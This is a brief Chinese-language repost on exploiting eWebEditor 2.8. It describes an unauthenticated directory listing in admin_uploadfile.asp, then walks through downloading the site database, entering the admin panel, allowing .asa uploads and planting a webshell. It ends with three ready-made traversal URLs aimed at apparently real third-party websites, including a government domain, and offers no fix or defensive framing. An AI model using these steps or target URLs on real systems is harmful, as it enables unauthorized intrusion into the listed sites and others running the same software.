作者:xin新的 | 来源:互联网 | 2017-11-13 02:24
ewebeditor2.8漏洞漏洞利用:各版本ewebeditor快速拿webshell.eWebEditoradminlogin.php,进入后台后随便输入一个用户和密码,当然会提示出错了....Xday,2.8,ewebeditor,利用,最新漏洞,.最新漏洞利用ewebeditor2.8Xday
ewebeditor 2.8漏洞最新漏洞利用:ewebeditor 2.8前几天爆出严重漏洞
由于某些修正版本对admin_uploadfile.asp文件的session没过滤好.所以造成不需要验证直接列目录,然后跟在URL中输入,查找到数据库路径 然后下载,进后台设置ASA 上传得到WEBSHELL11
http://www.eastlaborlaw.com/admin_dbh/ewebEditor_liangcai/admin_uploadfile.asp?id=&dir=../.. |
http://www.czmilan.com/xmlEditor/ewebeditor/admin_uploadfile.asp?id=&dir=../.. |
http://wujia.huizhou.gov.cn/xdocweb/webeditor/admin_uploadfile.asp?id=&dir=../.. |